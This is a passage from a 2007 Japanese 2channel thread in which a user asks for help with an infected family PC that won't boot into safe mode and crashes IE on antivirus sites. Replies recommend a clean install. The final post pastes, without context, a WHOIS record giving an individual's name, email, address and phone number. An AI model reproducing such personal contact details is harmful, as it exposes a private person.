セーフモードで起動しようとしても、強制再起動される。ウィルス対策のサイトを開くと、IEが強制終了されることがある(再現性あり)」
【症状が出る前に何をやったか】 「使用者にどんなファイルをDLしたか、怪しいURLを踏んだかなどを聞いたが、曖昧な答え」
【症状を解決しようとどのような処置を取ったか】 「隠しファイル表示を試行。セーフモードを試行。スパイボットでチェック。グーグル検索」

感染したPCは家族兼用で、私の自作機のお下がりです。そのため、セキュリティソフトは入れてませんでした。
ttp://housecall.antivirus.com/housecall/start_jp.aspが終了してから、定期的な検索はしていなかったようです。
CとDの両方に感染しているため、ファイルを退避してのリカバリーもためらわれます。
隠しファイル表示不能やセーフモード不可は初めての症状なので、どうしていいかわからず困っています。
有効な対処法があれば、ご教授ください。

712 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/26(日) 11:25:46 ]


  ___                             ム  i
 「 ヒ_i〉                            ゝ 〈
 ト ノ                           iニ(()
 i  {              ____           |  ヽ
 i  i           /__,  , ‐-\           i   }
 |   i         /(●)   ( ● )\       {、  λ
 ト−┤.      /    (__人__)    \    ,ノ  ̄ ,!
 i   ゝ、_     |     ´ ̄`       | ,. '´ハ   ,!
. ヽ、    `` 、,__\              /" \  ヽ/
   \ノ ノ   ハ ̄r/:::r―--―/::7   ノ    /
       ヽ.      ヽ::〈; . '::. :' |::/   /   ,. "
        `ー 、    \ヽ::. ;:::|/     r'"
     / ̄二二二二二二二二二二二二二二二二ヽ
     | 答 |     クリーンインストール     │|
     \_二二二二二二二二二二二二二二二二ノ


713 名前:名無しさん@お腹いっぱい。 [2007/08/26(日) 11:31:21 ]
質問なのにage忘れていました。申し訳ない。
本日は出かける用があるので、対策ソフトを買ってこようと思います。

補足:確認した、IEが落ちるサイトは以下のとおりです。
ttp://www.avast.com/
ttp://ringonoki.net/tool/antiv/review/r-avg.html
ttp://www.clamwin.com/
ttp://ringonoki.net/tool/antiv/review/r-clamwin.html
ttp://www.avgjapan.com/content/view/41/49/
ttp://www.bitdefender.com/

>>712
ありがとうございます。やはりそれが一番確実なのでしょうか。

714 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/26(日) 11:35:52 ]
>>711
つ ttp://www.nifty.com/security/vcheck/

715 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/26(日) 13:18:40 ]
>>714
チェックしてみましたが、該当のウィルスは検出されませんでした。
やはり、クリーンインストールして市販のアンチウィルスソフトを入れることにします。

答えてくださった方々、ありがとうございました。

716 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/26(日) 14:32:02 ]
Domain Information: [ドメイン情報]
[Domain Name] BIO-T.JP

[登録者名] バイオテクニカ
[Registrant] Biotechnica

[Name Server] dns01.hs.kddi.ne.jp
[Name Server] dns02.hs.kddi.ne.jp

[登録年月日] 2003/07/01
[有効期限] 2008/07/31
[状態] Active
[最終更新] 2007/08/01 01:05:05 (JST)

Contact Information: [公開連絡窓口]
[名前] 富田 泰史
[Name] Tomita,Yasushi
[Email] biot999@hotmail.com
[郵便番号] 150-0000
[住所] 東京都渋谷区渋谷1丁目13-8
[Postal Address] 1-13-8,Shibuya,Shibuya-ku,Tokyo,150-0000,Japan
[電話番号] 03-6418-0304







[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<222KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef